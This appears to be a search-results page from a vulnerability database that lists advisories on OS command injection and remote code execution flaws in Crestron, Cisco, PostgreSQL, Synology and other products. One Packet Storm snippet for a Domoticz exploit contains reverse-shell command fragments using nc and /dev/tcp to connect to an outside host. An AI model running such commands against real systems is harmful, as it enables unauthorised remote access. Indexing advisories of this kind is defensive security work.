Lucene search
K

1094 matches found

OSV
OSV
added 2019/06/18 2:15 p.m.4 views

CVE-2018-18879

In firmware version MS2.6.9900 of Columbia Weather MicroServer, an authenticated web user can pipe commands directly to the underlying operating system as user input is not sanitized in networkdiags.php...

8.8CVSS5.8AI score0.0205EPSS
Exploits0References2
CNVD
CNVD
added 2019/06/05 12:0 a.m.2 views

Geutebrück G-Cam and G-Code OS Command Injection Vulnerabilities

G-Cam is a series of webcams from Geutebrück.G-Code is an analog video encoder from Geutebrück. An OS command injection vulnerability exists in Geutebrück G-Cam and G-Code. The vulnerability stems from a network system or product not properly filtering special characters, commands, etc. from...

9CVSS7.8AI score0.03272EPSS
Exploits0References1
Cvelist
Cvelist
added 2019/05/03 4:20 p.m.19 views

CVE-2019-1803 Cisco Nexus 9000 Series Fabric Switches Application Centric Infrastructure Mode Root Privilege Escalation Vulnerability

A vulnerability in the filesystem management for the Cisco Nexus 9000 Series Application Centric Infrastructure ACI Mode Switch Software could allow an authenticated, local attacker with administrator rights to gain elevated privileges as the root user on an affected device. The vulnerability is...

7.8CVSS7AI score0.00318EPSS
Exploits0References1
Prion
Prion
added 2019/05/03 3:29 p.m.19 views

Input validation

A vulnerability in the background operations functionality of Cisco Nexus 9000 Series Application Centric Infrastructure ACI Mode Switch Software could allow an authenticated, local attacker to gain elevated privileges as root on an affected device. The vulnerability is due to insufficient...

7.2CVSS7.9AI score0.00352EPSS
Exploits0References1Affected Software1
CVE
CVE
added 2019/05/03 2:50 p.m.65 views

CVE-2019-1592

CVE-2019-1592 affects Cisco Nexus 9000 Series NX-OS in ACI Mode Switch Software. The issue is caused by insufficient validation of user-supplied files, allowing an authenticated, local attacker to create a crafted file in a specific filesystem directory and execute arbitrary OS commands as root. ...

7.8CVSS7.9AI score0.00352EPSS
Exploits0References1Affected Software1
ThreatPost
ThreatPost
added 2019/05/02 9:15 p.m.176 views

Critical Flaws Found in Eight Wireless Presentation Systems

Multiple wireless presentation systems have critical vulnerabilities – including a remote command-injection glitch and an unauthenticated remote stack buffer overflow flaw. Wireless presentation systems allow users to display their content directly from their laptop no network cable necessary by...

10CVSS0.9AI score0.98952EPSS
Exploits21References15
NVD
NVD
added 2019/04/30 9:29 p.m.22 views

CVE-2019-3925

Crestron AM-100 with firmware 1.6.0.2 and AM-101 with firmware 2.7.0.2 are vulnerable to command injection via SNMP OID iso.3.6.1.4.1.3212.100.3.2.9.3. A remote, unauthenticated attacker can use this vulnerability to execute operating system commands as root...

10CVSS10AI score0.0685EPSS
Exploits1References1
NVD
NVD
added 2019/04/30 9:29 p.m.26 views

CVE-2019-3929

The Crestron AM-100 firmware 1.6.0.2, Crestron AM-101 firmware 2.7.0.1, Barco wePresent WiPG-1000P firmware 2.3.0.10, Barco wePresent WiPG-1600W before firmware 2.4.1.19, Extron ShareLink 200/250 firmware 2.0.3.4, Teq AV IT WIPS710 firmware 1.1.0.7, SHARP PN-L703WA firmware 1.4.2.3, Optoma WPS-Pr...

10CVSS10AI score0.98952EPSS
Exploits10References5
CVE
CVE
added 2019/04/30 8:21 p.m.1098 views

CVE-2019-3929

CVE-2019-3929 is a remote, unauthenticated command-injection vulnerability exploitable via the file_transfer.cgi HTTP endpoint. Affected devices include Crestron AM-100 (firmware 1.6.0.2) and AM-101 (2.7.0.1); Barco wePresent WiPG-1000P (2.3.0.10) and WiPG-1600W prior to 2.4.1.19; Extron ShareLin...

10CVSS9.8AI score0.98952EPSS
In wildExploits10References5Affected Software1
Cvelist
Cvelist
added 2019/04/30 8:9 p.m.24 views

CVE-2019-3925

Crestron AM-100 with firmware 1.6.0.2 and AM-101 with firmware 2.7.0.2 are vulnerable to command injection via SNMP OID iso.3.6.1.4.1.3212.100.3.2.9.3. A remote, unauthenticated attacker can use this vulnerability to execute operating system commands as root...

10AI score0.0685EPSS
Exploits1References1
Packet Storm
Packet Storm
added 2019/04/30 12:0 a.m.76 views

Domoticz 4.10577 Unauthenticated Remote Command Execution

!/usr/bin/env python -- coding: utf-8 -- Exploit Title: Unauthenticated Remote Command Execution on Domoticz & /dev/tcp/172.17.0.1/4444 0&1 &' ./exploit.py -zipcmd http://localhost:8080/ 'nc 10.0.2.2 4444 -e /bin/bash &' import argparse import requests import urllib import base64 import json impo...

7.5CVSS0.4AI score0.1727EPSS
Exploits5
CNVD
CNVD
added 2019/04/10 12:0 a.m.2 views

Siemens Spectrum Power Command Injection Vulnerability

Siemens Spectrum Power is a system that provides essential components for SCADA, communication and data modeling of control and monitoring systems. A command injection vulnerability exists in Siemens Spectrum Power, which can be exploited by an attacker to execute operating system commands...

9.8CVSS7.9AI score0.02285EPSS
Exploits0References1
OSV
OSV
added 2019/04/01 9:30 p.m.12 views

CVE-2019-9193

In PostgreSQL 9.3 through 11.2, the "COPY TO/FROM PROGRAM" function allows superusers and users in the 'pgexecuteserverprogram' group to execute arbitrary code in the context of the database's operating system user. This functionality is enabled by default and can be abused to run arbitrary...

7.2CVSS7.3AI score0.91877EPSS
Exploits17References8
UbuntuCve
UbuntuCve
added 2019/04/01 9:30 p.m.57 views

CVE-2019-9193

In PostgreSQL 9.3 through 11.2, the "COPY TO/FROM PROGRAM" function allows superusers and users in the 'pgexecuteserverprogram' group to execute arbitrary code in the context of the database's operating system user. This functionality is enabled by default and can be abused to run arbitrary...

9CVSS7.2AI score0.91877EPSS
Exploits17References4
OSV
OSV
added 2019/04/01 3:29 p.m.4 views

CVE-2018-13284

Command injection vulnerability in ftpd in Synology Diskstation Manager DSM before 6.2-23739-1 allows remote authenticated users to execute arbitrary OS commands via the 1 MKD or 2 RMD command...

8.8CVSS6AI score0.02308EPSS
Exploits0References1
CVE
CVE
added 2019/04/01 12:0 a.m.1136 views

CVE-2019-9193

The CVE-2019-9193 entry concerns PostgreSQL 9.3–11.2 where the COPY TO/FROM PROGRAM functionality allows superusers or members of the pg_execute_server_program role to run arbitrary OS commands as the database server OS user. This behavior is enabled by default and can enable command execution on...

9CVSS7.4AI score0.91877EPSS
Exploits17References8Affected Software1
OSV
OSV
added 2019/01/22 5:29 p.m.3 views

CVE-2018-6444

A Vulnerability in Brocade Network Advisor versions before 14.1.0 could allow a remote unauthenticated attacker to execute arbitray code. The vulnerability could also be exploited to execute arbitrary OS Commands...

9.8CVSS6AI score0.03268EPSS
Exploits0References3
exploitpack
exploitpack
added 2019/01/07 12:0 a.m.12 views

Mailcleaner - (Authenticated) Remote Code Execution (Metasploit)

Mailcleaner - Authenticated Remote Code Execution Metasploit This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule "Mailcleaner Remote Code Execution", 'Description' = %q This module exploits the...

0.4AI score
Exploits0
Broadcom
Broadcom
added 2018/12/21 12:0 a.m.8 views

BSA-2018-744

Security Advisory ID : BSA-2018-744 Component : Webconsole Revision : 1.0: Initial A Vulnerability in Brocade Network Advisor Version before 14.1.0 could allow a remote unauthenticated attacker to execute arbitray code.The vulnerability could also be exploited to execute arbitrary OS Commands...

10CVSS7.5AI score0.03268EPSS
Exploits0
Kitploit
Kitploit
added 2018/10/16 12:43 p.m.80 views

SQLMap v1.2.10 - Automatic SQL Injection And Database Takeover Tool

SQLMap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lastin...

8.5AI score
Exploits0References20
Rows per page
Query Builder